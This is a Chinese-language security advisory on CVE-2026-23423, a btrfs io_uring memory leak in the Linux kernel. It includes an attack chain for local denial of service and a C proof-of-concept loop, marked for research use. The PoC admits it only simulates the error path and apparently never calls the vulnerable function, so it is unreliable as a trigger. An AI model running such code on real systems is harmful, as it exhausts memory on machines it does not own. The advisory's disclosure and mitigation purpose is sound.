CVE-2026-23423: Linux Kernel btrfs内存泄漏漏洞

漏洞信息

漏洞编号

CVE-2026-23423

漏洞类型

内存泄漏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核btrfs子系统存在一处内存泄漏漏洞（CVE-2026-23423）。该漏洞位于`btrfs_uring_read_extent`函数中，当利用io_uring进行读取操作时，如果发生错误（如分配失败或非预期返回值），代码跳转至清理区域却未释放先前分配的'pages'对象，导致内存泄漏。本地低权限攻击者可利用此缺陷持续消耗系统内存，最终导致系统崩溃或拒绝服务。

技术细节

该漏洞源于Linux内核btrfs文件系统驱动程序中的`btrfs_uring_read_extent`函数实现逻辑缺陷。在正常情况下，当使用io_uring机制读取btrfs文件数据时，该函数会分配页数组（'pages'对象）用于存储数据，并期望在异步操作完成后由`btrfs_uring_read_finished()`回调函数负责释放这些内存。然而，代码未能正确处理错误路径。如果在分配'pages'之后、异步操作排队之前发生错误（例如后续分配失败，或者`btrfs_encoded_read_regular_fill_pages`返回除-EIOCBQUEUED以外的错误），函数将跳转到清理区域。虽然清理区域释放了其他分配的资源，但遗漏了对'pages'对象的释放操作。这导致在错误发生时，分配的页数组永远不会被释放，从而造成内核内存泄漏。由于该漏洞需要本地访问权限且无需用户交互，本地低权限攻击者可以通过反复触发该错误路径，耗尽系统内存，最终导致系统崩溃或拒绝服务。

攻击链分析

STEP 1

获取本地访问权限

攻击者需要获得目标Linux系统上的本地低权限用户访问权限（PR:L）。

STEP 2

触发漏洞函数

攻击者编写程序，针对挂载的btrfs文件系统，利用io_uring接口调用`btrfs_uring_read_extent`函数进行数据读取。

STEP 3

制造错误路径

攻击者通过构造特定请求或制造资源压力（如内存不足），迫使`btrfs_encoded_read_regular_fill_pages`函数执行失败，返回非-EIOCBQUEUED的错误码，从而跳过正常的异步清理流程，进入错误的清理代码块。

STEP 4

内存泄漏

由于错误处理路径中未释放已分配的'pages'对象，导致该部分内核内存泄漏，无法被回收。

STEP 5

拒绝服务

攻击者循环执行上述操作，持续消耗系统内存，最终导致系统内存耗尽（OOM），触发系统崩溃或服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Conceptual PoC for CVE-2026-23423
// This code attempts to trigger the memory leak by forcing error paths in btrfs io_uring reads.

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <liburing.h>

#define FILE_PATH "/mnt/btrfs/test_file.bin" // Path on a btrfs mount
#define BUFFER_SIZE 4096

int main() {
    struct io_uring ring;
    int fd = open(FILE_PATH, O_RDONLY | O_DIRECT);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    // Initialize io_uring
    if (io_uring_queue_init(32, &ring, 0) < 0) {
        perror("io_uring_queue_init");
        close(fd);
        return 1;
    }

    printf("Starting PoC loop to trigger memory leak...\n");

    // Loop to repeatedly trigger the allocation and potential error path
    for (int i = 0; i < 100000; i++) {
        struct io_uring_sqe *sqe = io_uring_get_sqe(&ring);
        void *buf = NULL;
        posix_memalign(&buf, BUFFER_SIZE, BUFFER_SIZE);

        if (!sqe) break;

        // Setup read operation
        io_uring_prep_read(sqe, fd, buf, BUFFER_SIZE, 0);
        sqe->flags |= IOSQE_ASYNC; // Force async processing

        io_uring_submit(&ring);

        // Wait for completion
        struct io_uring_cqe *cqe;
        io_uring_wait_cqe(&ring, &cqe);
        
        // In a real exploit, specific conditions would be forced to ensure
        // btrfs_encoded_read_regular_fill_pages fails and returns non -EIOCBQUEUED.
        // This loop simulates the load and potential for hitting the error path.
        
        io_uring_cqe_seen(&ring, cqe);
        free(buf);
    }

    io_uring_queue_exit(&ring);
    close(fd);
    return 0;
}

影响范围

Linux Kernel < Commit 3f501412f2079ca14bf68a18d80a2b7a823f1f64

防御指南

临时缓解措施

在无法立即升级内核的情况下，可以限制非特权用户对btrfs文件系统的访问权限，或者监控内核内存使用情况，一旦发现异常内存增长及时重启系统。但彻底解决该问题的唯一方法是安装内核安全更新。